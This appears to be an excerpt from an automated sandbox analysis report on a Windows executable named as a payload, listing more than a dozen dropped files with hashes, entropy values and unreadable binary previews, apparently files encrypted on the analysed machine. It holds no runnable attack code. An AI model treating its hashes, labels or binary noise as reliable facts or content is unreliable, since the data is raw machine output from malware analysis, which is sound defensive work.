                                                                                                Size (bytes):1750
                                                                                                Entropy (8bit):7.8923063470169685
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:0JV8kQ7wO/4Zxq6GjhpRcZmstA+axfzsDzQI7J2ywHjWZwOXos56wx3bD:0f87MO/cEhbt+ahsDsIF/as568LD
                                                                                                MD5:6568FFD54B135EAF8A54FAE567CFE8E8
                                                                                                SHA1:EB5821D1B04FC2FBD4F74E80453B9FF4E780F61C
                                                                                                SHA-256:9666BCDF376C0B5C79AB2A8DFF027250CB94F95954F7FA6154C5010BCA475E2B
                                                                                                SHA-512:1851958E3A7C0B9523E6BBEC738828A8A7440CDE96A0196EB824937F40D64462B7B530AC55CF8C59E2648A830AB3ABCCC5AE9838467B4ABB0585D751981AC013
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......m.p..7.Y7..]..R.......;...=.'...:t.....s.d.:.s...S..~ ....Y... ....._4]...83..\....5.z../!..3.p.e...P..F=...NblJ...H\d.wr.c..[.O.....hZ..! q.....I....|.`....Upi..(.........R.. F..`)G..I....X.M..8.>.k.\xXQV#..-.n..w*..Z.v..>...LW..qF8g....0....J9.C...zv..n.C+.Wt.J..4.....;A.T.a..F...7......N.5..n.E`....(.......3<X.."U&{)d.5.J....U.I..>...G..d.......V...*2...v. .2i.o..f...e.....\....)......m/....$......h.;i....uW...|.}.ylm........!.xX..a.[4_S/...z..,.}.6.../)._n...g...}.O3.I.....$...?.f.}.e..sSU......K.....r..O...J.~.>fx..E9.g5...[4J. ...~..s..`#0..(..;....b.g.m.=M.y.D.._e.Xc...d.....Zt.JM.tZ.....&...h..7.R^.4.ge`4.....]Ug$..w.F.K.a.&...?.(..Y.o..|...v.....T,.M....w..|l7.z4.L.-.o/...2..Oi..u. j.f...m6.....G....9..b.{......J.`|.<....*?....X-.{.z.#.&.,.....?V@..@]E.p.L..q.T.3....!...A...Y.....:.Z.j....z#...ZC.w...Nh6.Sc.NRT...&..&r)......L......R..../...9Z....=B.@(q..{rX.W&.x.........R{.8cU.V..0...fE..=+@......~.n{i....N.u>
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.881852213152744
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:blQappwMMIq/RRjMuIZdo30KXjXRxKq8MSou9MFJQcUxB+JbnW+TF2krmJspx3bD:ehIqdoW30KxBSowM78+JLWc0kCJsTLD
                                                                                                MD5:C9D7474E0FF4321FBD8F7318AA5FD7BA
                                                                                                SHA1:EFF779AC6B5454479FA912EA9BD2668263495AFE
                                                                                                SHA-256:98550A716F576820851926B9E4A34823C6051625DDCA37BE34F5DD358B31831D
                                                                                                SHA-512:1792F3B5F61D7EED84898B428D2BFB5BF921FB3EC492FD5A416F4767241F1704C17A9F2D0ADF996B4640F5B4F4677CCC8C3DF138E55AE248F84D0416A0C4823E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.E......c...B/.\.<d.$.a....jE.Q!...&4=..uBm..gZ.kf.9-...`.K..o{_...>q....B.Z.'.H.,#.H.}..^.].Qwv..E..D2x.......\1..cw...L.'....C...s.1-....z .......0`.... .]NUK..t...g..&..5........N1#x..%qw$m.`.T..V...t..}......\...S{..m....a._{.....f.b..zl.C.~.m/Z....|.d.....T.u.fZq....K.w?.p<.r..o..W...P..!......1.t..?.m.T..QcyE..h*.......O....R'+.*..... .......].b..j<F$}.E.G.....v.;.D;W.5...7+.CntZ.Q...N.8...$..z......t.$...k.@].3+mo*P.K.../>fM.....4}...6............`D.o..w.KV>a........ ?:.7...7..{.....]pO....{mR.p.|Ba......*.v.F6C..)#.y 6.R..x.8U.gs...ra.....+..."..& .x~.4.....Kx....`.........w...C.E..vd0.|..v.X.5........4....6..B..v..gO...G....E....v}.ay...l..A....4.&..4o..qT../.C.e.._.U..v>.m...q,......ak.BT..7.....1...!K<.d.[.^.1..m..c9..vV...D7...Y.?....~R...V\.]...v.^.Xa,.l04..q....9[zGM.Q.h....6E.I....-..p_...).M.(.....l.......L....=..BD..n..I.o.X3.z~A...C..b2Q..}W..o.f@..S....(....;#.....4|M.y.)=.. .....Z...{!.:..J..5.}O.....E..:.x.g*.y.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.8670258326926925
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:hM78VTeQKKcz6GZSZ9Ob6HCGqv/Mwvk+4is03EoLD:+8ViBKUuZ9ObsCGqv/xM+4VuEc
                                                                                                MD5:A2E37AE6D77F69A85A3F612A6FB6BC13
                                                                                                SHA1:79A32DB297F08F040DF4307786E7048F92BCDC77
                                                                                                SHA-256:DBC47164317F56913108F3D06017B3A4FF33547D61A145726290A96D59369F02
                                                                                                SHA-512:751722771C6B5D5F828010285B265CF0489E94F71419279F33EE5D3E4BDFB0F78B7536C742AC8D795A6B3F83E2E6F28985EAEAFECF2E0447524482EB583F3FC9
                                                                                                Malicious:false
                                                                                                Preview:<?xml..Hz....q.y".!..;s6....Lx..YxB..V..).K.0.\....'.$_p..Y.DE(~..b..y........3..~.sOT$..\ac=.....1.(.f..en(.aL.]b.:.......q..'.W.C....{w..._4.A.^..yCT.N........T...k..Q...B.+.Q..E..B.....z.....H*...p.7....3.2..TS.f%..$..Vr%.0b.t.!...Yo..'B...P.YF..d.n.~4...wFQdn.....!....p.~....|W....4E.6y....J..:.r.A.Y.@`.yb..40%...p.....'iKs~h.|M......}]R........^]X....W...~..Fo)....M.1..h.p...r`d..r.}..&&V6uon.S.?e.(6..Ec)e.x......X."..9PAzp...N...\.@.6.....:.5%......@[.><..LP..Z.3...'9m1..l.7.<5&g.Xt....3"....7&.8......g..S.n..<...x`}0..B.]cX.j<...\.......S~Ur..6y.........;e...T....8:.v/...`x.....[.i2.E...n0<<.rQ.\.H......;..v....N5A7i[g..y.5~..YM.e.k.8...../.&.........$......D9.>...I._{.....}...nO.....e.[:..".Xo...D.T8b....A}..\.........,..@.^..Qf.._c....m?k@...%.n.o.\.5l.@u....8B.>..I...,.T...[...<..x.....o.A.1..{a...D.[\$L........".{4.t|PT.....<...}.[._.p..,..$..:.N'..b..N[.e..w..g.9...fz_9.y..:~E.;.....3.h.}....Q.o;y..]b......i..k...b..$...r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1697
                                                                                                Entropy (8bit):7.898541921782792
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:NMdPRiftxW81ExrmDVHpJbA6P+ZyeGEqempDLD:NMdZiPWTcP0IEqrpr
                                                                                                MD5:3154A6BE168698DC74A01E99C28ACC8E
                                                                                                SHA1:041932E18097F9FB9BF7B073D39E84A6D88FE7D9
                                                                                                SHA-256:3FD44BCFB8DC9718B53A23170B6E29AFD553C69E3A592AEA3B1413DAA88AC396
                                                                                                SHA-512:1FECD9E11A4BCA58849AC815017402DE2D476388F0CEE95417614742183A040C75C6BCDC29D1415E5FDB5B65A3512B47E8853B85D1D492961A280D89C660F72A
                                                                                                Malicious:false
                                                                                                Preview:<?xmlT.."....!.".A....V.Y.brh...V.3....#a......(S.~.M..JP.y..}g.L$).>...|m...2/...H...+.er..Pw.v.N..iP.....D..]...'.........&je.B[..i*w.7.d.......6.r..|.'p............3.o....|....`0...B..z<8.+Ai..:{... Hu...6..[...h77......som...Z#..MZ..\.l..Y.o.........%.3&......S....-qg......d. .pC"O.nNy.%...r.....:t.[.C...{,.Y.......4n...8....}......E....F.$.X....(.......e..@\}~.\.~|?@v...G.$..*.... ;1..F1.Igp.Ihoq.C2.RC`.......%[..d0hg...v..8../...Q...*@.q.7P$..."]2........2....:....R"......^...H.:N6....&e.C.&.').].eM......`....Ug..b"f..AX.}w.1.L.....e.x.De...G.<...S..+.W.O0..o.p.P(.}`1.]J....^....q.DQ.S..X....G(`...H..i...1.......V@...."dS...TO.e<.3..C........U=..^.+..J)......ei....G.......h.TG..b.\7...F..!........c...[|..Z.p.9...YbN,.>.(l..:.....xT.....R...^./z...*^.r..V..v.0.r......v..-...aN....u.....V7f..l..k....K..6.=.P..Y.LV..b..L.m.9e92t.KN...s..Y?.......C..c...g..Y9a..8w.8...g..P.[....N...1.1.W...y.G...2.9.y...f...;..<5..u<........\.x
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1734
                                                                                                Entropy (8bit):7.8821296317536
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:65u9wNTEGOaq7WAQOhWoxF9qhES/BEEwU/LD:uKwNTfO5LhNxF9qhLWEpf
                                                                                                MD5:A576B384F457C8DF290C17459758A6F4
                                                                                                SHA1:82F914E429FBD414A48100727414E00DB2902188
                                                                                                SHA-256:2ABF63A1ACCEBF08DD5A84949800E89D55AD6CE699F2ED32012383F172969DC2
                                                                                                SHA-512:10F5DA0661E6C8A454D944909ECC31BD67E77DDC015816BAE4F1D634C6AC59B2553F1229FB8A3337D6EE84EA9A496357389E4FEE227200736E8485BF40B06BE4
                                                                                                Malicious:false
                                                                                                Preview:<?xml.p%.s"R.......r.<...Ch...LAt.{..........w,.f.8 .#iw}.+rT..~...Z.k.}M.N........^...t.QFSh!r.M.B2..BL..;...L\.7.H..\...n.&7..C..J...l.m.LHH.u...C....t..J...Lr.Q..:I.....j&....%.. ..XO..W*....2.5ls.)#.y...".z.\....M|....~..\....g.(^.~Y.../..........k.u.Q.|X.....2.y.DO...*sSH...A.T?..d...~.S...........ST.......E....C@....\....p..P..s...'...v4..]._..G..{..0..a^.....DC.......\....Q.0.:XR..w..n(]L..m*{B.....E....t.3.U}.mPw....Y...o.z.....>..%....u..".A...Ohm...o..-.;!G......n..uBA8..;f....d1.....7.*S/.c....z(...RF^.C.......<.-..i......v..1...I..h..5..!....BM.RP.oA..N./3.i..3T...|T2....z.....,..f.-&.=..T...K.....G......$...ts\.lG..._..0.D..G......=D.......glwG/. ..].uS.f]....y.......>tfU..K-.z......)&#....%.R.Y.E.#.~..>..r...WY......#?c@@..#.>../.`&.=.........P..@.?v.&.....H.....X.7...d..a./..2&C.>.N.*..z.).....!.V.;8a.x..\.....<.+.l.R...I..>..n.z[.0.0..U\'Q.....<.(p..c/........3.N.a..a1M..[s...Mg..........(7X.........kh..[.....r..VZ.O7P;....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1704
                                                                                                Entropy (8bit):7.871477154810974
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:9g5dMKt5JLIFKph8ptZmPU2uTfgZ/s4VGoKrtiAhNrMC9uPLD:o3tz6KpWF2fZ/krtiAhGC9k
                                                                                                MD5:49F0D236A092F7E8927DCB8A143DA1D4
                                                                                                SHA1:FC4B276B42BDA23985A28A1C692086F541DFE002
                                                                                                SHA-256:5D45FA235DF28EC8C2ECE00BF3118BE8430B26B2770E17EF8C311259B6A8AA96
                                                                                                SHA-512:E51FEBD193154F3E1838F336D216C3A7A851C7CFF3668EBECA970137FF5F45B23D75F25F4C745E6BBD3564BE0417FD24AB48450F7B8ED9F2EE208219066D6CC6
                                                                                                Malicious:false
                                                                                                Preview:<?xml...i5.......!"...R......f...w.......<`.t.3....j.w...N.-[..lI\...G.U...`.t..#...!.T..|aTp$.G.G2......\.M0.j..[.`...yv.aX.(v..`.....q...%.e}.F. ..~.~....r}....uiLv.......2...5...u..:.'S...>..-..q_9.^...C......K.^h...-..U..lf.....K...G9U............%......bTu<.....Hc.%`Fn:.V;[..)..Y..Zl.3^.$9.Cu.c*.4@H@..DS8.......je..h.j`.Z....AJF....]M...Y...0.;. ^....K.6L..\.......Q...S.......h....2P......v\.V....\e..{.=...t...`-A.......#.!m6.P....-%..bv..v.b"^.*...r...gu.t......*..i..U..K...O.^...L...xKM......>.st. h:i..)hU].Okv\..)./^....(%.K.j..X....*.c......i......f..f..F.7....h..&v.w@.E.].."..?..Y.4.%I.n-..0. ...(.}c......5....d..]Tm^..R.l..r.6.....E`sM.......J..@..U.i.Aw..l...)z9...\.Ql.k-j.-[..*..4...v....t...Fk.A......l...1\.59H..(...UAPF.Q#s7.vP..........5..jT.n.z.-.=.];.[..5[!...x.%...>...".....-/.z..n.,^....}.......d ...).N.MU4..S.]/;7.7.Ks.t..|....Xg..9.(......y."...u.y..CKS...N.Q&....J..P$..FE....7s.....<.t.......j.."v..x:W.i.6A...c0.ag.o].5&.:...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1741
                                                                                                Entropy (8bit):7.890192534947182
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qhBfWvWOfwdZKdoM0pa52DMj8h3eb9sMnQLD:qhlnEdoM0I52wkeb9sr
                                                                                                MD5:CF4F690F191C8CE784DF582110B14A53
                                                                                                SHA1:C616A5D8FAAA0C44011A1A2FCA790F24DAB871FC
                                                                                                SHA-256:13A9FE1605372E514DB00367DFAA9AAC2A90DD3BE25B300F1B5CAB7896177EB8
                                                                                                SHA-512:C3FF560F718D14CE606BD48808549931166B322ECD3598724DBE611C4F1EDEF84BB2540DA6578300F702CEA2E005171F030E20E8C1EE9E23DF8519E18D1DC9F7
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......4l...W.x.%X.`s0...:.dE.?.F.I......iHM|!.'.1t..o]........V.!...(.........>#......f..sZ.....E&...X.8...cEaE......+.[..#..)w?.b.5.8`.......'.....gFd...Y....U.<..g4.Z.....X.(1...jI(..*.$.........}.....Op....mZ....$.3L./.....3.."+..n....Q......A!.)......@.r..D..>..5(.jg.5.n..2........%Pq...df6..mv.98....70t......]...x.9;.\a.Pa..3%f.{........D...l3;tnCxQ.t.;..^.z.8M6......R..}Q&.I.W .....F..P9.V...*..e.._."5ygr..op ..;...,.....w.O..>..Xot.O.yzkv?.#.qG....V......B.B<......#j.5....QE..t...%!..<...bo.d.e.K..=.rYg5..R.DV....1....T...39.....LT@.?..(.....}..Y.g%1..Hj.q.~Kr.f.v+......(..F..._..s....s.Q..n.{.....wyj.....F..j$..d.@..K...E.........".0.'..|_H...}..<...f....Y.Hn..#.........2...=..3..WK........gaA.........p....J$K@...+.R...d..nU>.T....qM.1.}.....X:n2.....@.../...t..U.do...^..?..#.#....k'X(..$..>-.L..E'..p..F.].$\0Fh..3....}..L..:.....].3.eQTh.IXz..i.;.-4Bb..P.^H.......|'f..j-Y....0.6.+.V........%...."..S..^..w..#..z.v..V..C.(....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.880439421024077
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mxAA1SH9SZbxkvsENgk2WNqyWzF2/o20Iq6S+riwyL0iPOeXAbLthWrG+x3bD:CAA1e9SZOs7qNmFwr3JRiPAqr9LD
                                                                                                MD5:78D7E94045F6FCAECAD94BFA0B135E8E
                                                                                                SHA1:08C6CAC74FE2FDBB8956BB96E7D8544BBCFE973F
                                                                                                SHA-256:E9D1F916CC80FF153D6CAE3416FEFDF3A25C67E56FC3A81425728C1B38C4E516
                                                                                                SHA-512:E4B04C2CCC0C4902E0397CD3C45A369FA4114C1750188EC6D20CEAE5E9C3DAF2A17A5DDD42DB9E5F124BB67211DA266611A92C7709EFF028E23A26F569FB6BF1
                                                                                                Malicious:false
                                                                                                Preview:<?xmlC.V.....I.|;...C...0mD...........b.46.?z.i.dt.. ...2b..N.)..P..C^-.zc..*........,.~J._....d.y.Co...1....k.H....>.5u..K.[.T.Ha~........W.%..U.R..V.[.d@........g.z..L ..59.6.....L%cy...~_y2.36...p...o..Ju..f..J.......[.....Q..WY.[.g....|."...r..e.#D(..I.iz&.j8..tcW...9'X.z~v.{z...[..+DqXw!%.......I._..w....:z.t.K.......8...=E......u..0#.$.0.......{].{..L.'.x......%.^,.....|.R..S.....`.8...Uq6....gbu..4.M?Y...):j..1...J......v..w......Y~.3..Y..X...\.q.}&.T......V...]...+|.c7....P.s.Nm...Dz....y.;j.gn8."....n..2.G.E.Y.n..^R.Z....,.T.40.....P.X)..t.G..t...... .C{.,e...\.o..g.F?.'..D.............1.\..^....,Hi6As......&....m.'9ry5./...6.*..Km5X58a.n.;l.34...I..@...r..F...a.n^I....)h...........".J..4.s.o.N.....[G.t^...!.h.....D...s..p@...D...*.....*f.r.!..R'.+."\.>?p.].).q.".......0...A?U..o..%~{n.-..6....Fm.....~G.U..!c...G.`+.8..tNeQR,.>.2. C.%./.y..$...W.m.(...z.\..........K..B.|.W........+sj]o.g.!"'.........o.f4`}..P..>.}....?.....L..}U..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.858814533869446
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:O2mYyUXJZRBDKObRH8X7zgI7rZbvrKh0RgEp0I5gXzdLD:MYH5nVKObR9ke0ZJ5gjJ
                                                                                                MD5:BDC5194A1DFF14F7D4D52D0C405259F4
                                                                                                SHA1:A92A52942AFD27FA59EE1437095E060BA1C05984
                                                                                                SHA-256:14BA87FBD2AB6351AAC271CBF90A745E22E416B5CDA3215ABFE7D0E15CE66717
                                                                                                SHA-512:FC3452EE2715FAB563079AE919D76D24245D203D9F24B04DE795D8F3296472E3DAD9A81F924EF02C5CD15E6E5B52757FB43B0C5E4CC07E284735B03B1A04BE44
                                                                                                Malicious:false
                                                                                                Preview:<?xml..F...$F..+?.^,G.XlT.%+..`...T......Umu.......z.....Y...~=...]B..0P..8G..pQ.7....*...3@..5'u.........>q...4m...g;.B.......)......\..|Es...G....v.....X5.7...Sm%.4..... .g......N...'.dG..q9w..&.K..Q..F...1.4.]..~.......E...L. w..l... ...5.i0...>j..-$J....LR.....%C.Qy_.EF|..-.....rx.V..:.K...=.`.^[...ITIc..D.?.........R,...&.....%x.j.{...a.C...RI..]..g...#.g_...S..e.l......$..i...^D....F...T....m.l.|}..V..x...?.0N3...E+|?..-.K..|..}z..w...=..n.?).J..{....Y..R.S....m.....p^l8{m.J/.}.I.. .Y.N.,...XyJ"..b/.....o o........e_.\....Z*..._.......$~n>.....g(R.{.).s.@xB..u..BG.e..M....N...<.>'..,.K..H...."....dd....[.....{..#......+[....t.`.2z....k..Z..n.R._9>.r07..v`..E...,<..&...D.5.MK.V?....S...|...iF..pL..A.k.L8..5....s5g{.=J.sz..@.O.4e=...).......*.8...6.48.F ..].8&L.{D". ...2|.q.........^V...6r.....P.m..I.|...F.!.2=..6....|.K..(..,d......(..T.s.x3"a...-..Y.:.~......8k..v."M.....+..Dp.=...iw.3e...'$_X....y.`....-2...t.[......i.w.e..v(.J~.vL
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1693
                                                                                                Entropy (8bit):7.876674821902144
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:lL5L/QHSzXZ/5uawU9PMTZqhqH60auISPAuZRX1lvLD:lL5LmSFjEZq40uIm1X1lv
                                                                                                MD5:1EF55849F05066ED230A426EB8A4E6F1
                                                                                                SHA1:040699FD83C00E08345D74166A324F7B99B05BD1
                                                                                                SHA-256:EFC5F1E10E9BCAE943265781115BFD3EBADC4779EFABB907F8FAA54A30EB5C81
                                                                                                SHA-512:D1C4D638436F5672C14780239F2DF37CD91074C18D7285FEF106C05386DCD189F9FEA629B22F0750E65C0A52B67C28217E451A1A5830646D1E506CEDA09B91B6
                                                                                                Malicious:false
                                                                                                Preview:<?xml@`...2]D..B....1...DB...Y...I..Xg.;_..].W....i..$...-5.QI.&k6...7....H..C.......S.r..../9..|0./...c..X..D.a...|Z.F......s.7......"....(O70..m.~.av..a...5...g.b...q.g.....c&.e..=R9D....../M.+w.....v......3..B....yr..#.P.&CW..?$"j...@s0.k.X......._...AY.\:F.`X.....Y.it.H.(...........6.8p.....2..L9.Y.M.a...r.t.q(h.M..{.jk.Kz.....0Y7.s....4.|.-UL.$.............Y...N...T3M....4.zrT].}.\..I.C.?.X.nO.t.9...jg..1..`.b(Wbo&..t).6n..."b..\^t.c..@..QB1.%.....<N.X...Wh.=..77.."Z......f.k.Z.+P...I.~.S..^..).......j.<....i.6.}$..y ^..H`0?..$..U........9.C...tN..n.D.....W..; A..Re....5..$.q..+.".N...M...........MD..P"|.9[q....``...5..M..y....gf.3..@u.<;.....O.c.>.h.."b.2...:F/.b..V...r.../....]....Pr..6...~...c..Lj....'.N..2d'].<.[...a..C......&/.{.^xc=uzii..:.X..._Ol...?.|\....D.[<.`.J....^"..ro...HT._.B.....R..@...8.......+I...Y..W./...^.......C....5z..kl..e2/...3.2m~...5.NF..{:...w}.Iw-..UE..H...{.%. ........../......I...(/"}@|]........9.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1730
                                                                                                Entropy (8bit):7.899274541999338
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:4d4laqGnsdOriPcl9uCgkji399QwzqRkdKzbHr1K57LD:4dxZsKiPcl4jkQvbqRh/1y
                                                                                                MD5:DB9964D3D402CB7C32BA3B77A37D2A29
                                                                                                SHA1:9092E334776C22B44E0F9BDE8CF0D24A78329B1D
                                                                                                SHA-256:5893B26A8D75AC35CD93D9AF61A2F6BEB9EF3103255605E36B914958D33205EF
                                                                                                SHA-512:84C554A108B01C73DFE915C301A32E30C883F20DCE78D2077EFB38C16F8343AA7DEE61C1C463E88BE1FC40ACE2C662C607609CC6DD406F1F528C0FC629D36E9A
                                                                                                Malicious:false
                                                                                                Preview:<?xml..a=.....bl.hE...>5....H.....".=J...Z..o...x.N...$..<...2P...4..qjc.um.].@wL.3\....{.A.....B}.O.O.zF.....5...EW...Us2\e.-.Z...I..V..<.O;..v.h..qS3..J.P.Mv..W....h.{3.....R_OJ.`Sw.A..+._.'..........Z.*}:\l..].A.su.9..a..j/.@]pr....m..".$'#D|R.z.P.W.7...`*....;..$.. ..Sn....C...xow0.F L~.p.....&.u..]..s.\..Y.O.D..6 -.f.D.pp........XFF..i. ,U...i_..j.\.ZW1..3.3H.E...Q.A..B;CY*.f...d....0.l...w.2.^......&.r."/..q....Ti.`.2..3..,/:2...c..v.....5.....F~.Xn.6...j..(..2k.s.#q.....*...)..<:..7..z...L..DY[....W:......C...'....bA..vc...'.....59`0t(..P0c....z.R...! .!.|.=.7.....-..fq_..~...j...V.d-...NWl\yu..~.v..nZ..O6#s..{.| Om.J.^.z$..m.|dP:Z.<..'.2....&.O..w..A..Qb...*v..../..P......r..rT....-.C......3..%.C..Cx..%R.=.g.#T.@..>...!W..:.e.*d?. ..4....3-wO..4.+s.....I....U$..$.n...t.....~..2.....>D@At....,..P..q.N....La..k..|C..3..q..@|.u.m/..L.B...0....L~?.(5..}.oJ..~|.`.x...0...K.....k.bb.\,.....d.:.59K.a.....]b...N.."n}$.A.O.z....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1685
                                                                                                Entropy (8bit):7.882902051598975
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FZpf+NwPjd9cVmLTOJxvXcYFmVhhzzuYXusCVhBkuah3pEm6Tb/3Wx3bD:FDqKjd98sTUxEZVhhzz3KhIJKtTuLD
                                                                                                MD5:C05AA97992FF4A9D09034459C277A3B5
                                                                                                SHA1:CB909087690B96F03973C8C8C481A2C18A344D09
                                                                                                SHA-256:58798B3971576990A381A50E091159D5D2ACA7EBA9E1D281E24A2920D018E7D8
                                                                                                SHA-512:69C1F875E3F2BCFAE8A9F93E836CB95F9330C129A817597760800E04420B74AE198CB37EC45A4FDB96137023D0AB84E63BC217B66F86D0D555D8B1576E0EF9EC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.49..........._P........PU.....|.z..66.o.v+.a.....3..s.`....A....Gm.4..,..B[.....y.....!..*..l.)...tw.|.m..W.%...0.....;Ft.].1.e.x.g.-*..>.n...^.....wZT,/..4.mg..=...@......X.a..=./9.....fWh?.W.$lrJ.>..mV....".H...-.....}.4......eW....\.`%C../..c..@..`.Szp......qe..jM0.1Q..H.&:.......$......;....Z.............,.p:.].Vq..A.......k.4.Vw.FA+m*.A......W.,..[.....:T.Z=..{..`.-.....PF....=.....:.....Nfu..J.......O.)@sE.?..X.......3.Ew.o....r..I.. Q..&.R.:]...{.!.....1W...=.=U.,f..%.....=+!.M.K.g.UO.*.O..A.......(z......z....h....to.aY.#..N.ncL.Gtm.5...w..H.T..[.c0..A...O8=F.CX....*.7.....D....3W.(.8}a.N.!.b..)..6.gI....A9.1..`~I... G.C....,..bF..Of.....).Hi. .-..rI.|9.....'.8..`..YO...t-.p..."....<.<.}.l.mU1k;bV..s@:f...w.d..}..#'=T*.^(z.h.][r....=..`r`....Z.W.0.......^..1.l.F..h.Wk."P.0........d.6...!X1.u.x.g..l.-..&..QVO.....T..&..#^.....6....~..5.c.[.V..z.3\....K..%C8.+./.........2b.M.e`.H...ca.n-..H.64..|1./...^'...e...y].nA.K.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1722
                                                                                                Entropy (8bit):7.877478195660928
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:6+7mVqF1u008DFn80y8+R0WyG0MOGbmxdxZCXbLD:6+7nKc80y8RG0MOKmxdTCz
                                                                                                MD5:60033EF3342B442ED02487A48F62B8F4
                                                                                                SHA1:7397EBA1551B66E8EE84A83B177D7DA2944914EE
                                                                                                SHA-256:5DC16A564F48CCD18F3355C32375E71FAD7BE20CC3D73E1C97E6147D8DFA78BD
                                                                                                SHA-512:3648B62C1D56672152BC2860898362EB0168B8F37544322B420F9DB1E077AB0680A93840665D86DAC91C8B8413B9E56CD53AB67FC1E9F12A3D38B41AEEF98F92
                                                                                                Malicious:false
                                                                                                Preview:<?xmlj.=:qc...^......0.......s5.4%m.9...8.=q)kT....=...>.h.F^yr..y{.,....o.W..;...(.^.^......!..iT.N.w.$..%3#..k...?....S..`.t.+\.y..i.l[W?...6PP.%_i...F..........W...o......g.9.X\....@..\.%.:.h.L*.(../..sVu..U':O....&YV26.^...i..2(.:y^*.e...I.".FV#v.wL."....lc.....F..p.........]...1...84Mt...Y...t...a..eZ...3..G.W.h.?.fFc......U.H....SP:...S.!.(.|NpR.v.;V..'...s.\.......x.j.cK.8p....mv..0.1MqS2e..%....Y.'1vSYT.......%..C\...2}HQP..!v.Q...C...6%..'4...en.T.d(...<t...4..........)..v.Sq.Z"Vq.}.mJ.x.p..B*....6.....t..g............#...V.\I.S.d..&.....%Yx.8....f..C...,......q~.|(._.....A..C...|~5..v..!b.1....5.uf.M.q_."z..D.......7.....~%.......^w.IaH..E[Z.......9.:.B.#Nc.$^...\..="....F..&1}... ...91*.4.9W.......h...s>..]uG2.N.n.q..4M.QhX..p...*..q..........s.*..F.....AR.A.D.1:k._.R....+......*.....WvF(.....~s*....1....d:.I.....m...Hs...nT..v{.u....=..R!.2M.s...Wb..j\,.?.........)]1,.\.y..(.......2........I....A_.WuK..s*g.D[t94...f.Z..0....7..n
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1695
                                                                                                Entropy (8bit):7.87974046575672
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Zti5UrCiB4RkFcuMchgUfxa8rb58c6m9EQKbdg/MLD:ZtiuuiBKkFcNUsMCNddD
                                                                                                MD5:5506AD18CC51089D89F97668F228617A
                                                                                                SHA1:5A1E4F5B33D9EDF856363BF1895E555E88F57B88
                                                                                                SHA-256:F280E5F4576801CC3926D5D77422BBF884A259D91E84B4DA471576FE1FE44199
                                                                                                SHA-512:61472194013C1B5BE0A1FC917832CC3923521FFEFF2740D62B67018614202DBF5CA978458D2F33DE4AF8F0AEC89F76A18A62281650301665CA32B1ED1B8A31E1
                                                                                                Malicious:false
